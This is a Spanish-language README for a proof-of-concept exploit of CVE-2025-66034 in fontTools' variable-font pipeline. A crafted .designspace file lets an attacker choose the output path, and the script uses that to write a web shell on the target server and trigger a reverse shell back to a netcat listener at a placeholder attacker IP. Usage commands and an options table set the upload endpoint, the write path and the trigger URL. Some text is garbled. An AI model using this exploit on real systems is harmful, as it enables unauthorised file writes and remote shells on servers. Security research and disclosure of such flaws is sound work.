
Exploit de prueba de concepto para CVE-2025-66034 en el pipeline de generación de fuentes variables de fontTools. Un archivo .designspace manipulado permite controlar la ruta de salida, lo que habilita la escritura arbitraria de archivos. El script automatiza la creación del payload, la generación de fuentes y la subida para demostrar el problema.
Este repositorio no introduce una nueva vulnerabilidad.
Este es un exploit de prueba de concepto para CVE-2025-66034 que afecta al pipeline de generación de fuentes variables varLib de fontTools.
La vulnerabilidad permite a los atacantes controlar el nombre del archivo de salida dentro de un archivo .designspace manipulado. Cuando un servicio vulnerable de generación de fuentes lo procesa, esto puede provocar la escritura arbitraria de archivos en el sistema de archivos del servidor.
El script varlib_cve_2025_66034.py automatiza la creación del payload, la generación de fuentes, la subida y el disparo opcional de la shell.
ncPython 3.9+
Instalar dependencias:
pip install fonttools requests
Netcat es necesario para el listener:
Si tu objetivo es un laboratorio autoalojado que se ejecuta en mysite.com, y la ruta de subida, la ruta de escritura en el sistema de archivos y la ruta de disparo accesible por web coinciden con los valores predeterminados del script, puedes ejecutarlo directamente.
Uso básico:
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>
Es muy probable que el objetivo utilice URLs o rutas de sistema de archivos diferentes; sobrescribe los valores predeterminados con las opciones disponibles a continuación, como --url, --path y --trigger, o modifica el script manualmente.
Nota: los nombres de los campos del formulario de subida multipart pueden variar según el entorno. Si el objetivo no usa los mismos nombres de campo que el script, ajústalos en la sección files antes de ejecutar el exploit.
Ejemplo con opciones personalizadas:
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com
.designspace maliciosoUn agradecimiento especial y respeto para:
Esta prueba de concepto se proporciona con fines educativos y de investigación para ayudar a comprender la vulnerabilidad y su impacto.
Este código se proporciona solo con fines educativos y de investigación.
No utilices este exploit contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.
El autor no es responsable del mal uso o de los daños causados por este software.
| Argumento | Descripción |
|---|
--ip | IP del listener del atacante |
--port | Puerto del listener |
--path | Ruta del sistema de archivos de destino donde se escribirá el archivo (debe ser accesible por web para poder activar una web shell) |
--url | Endpoint de subida, el formulario puede variar |
--trigger | URL base utilizada para activar el payload escrito después de la subida |
--no-listen | Desactiva el listener automático de netcat |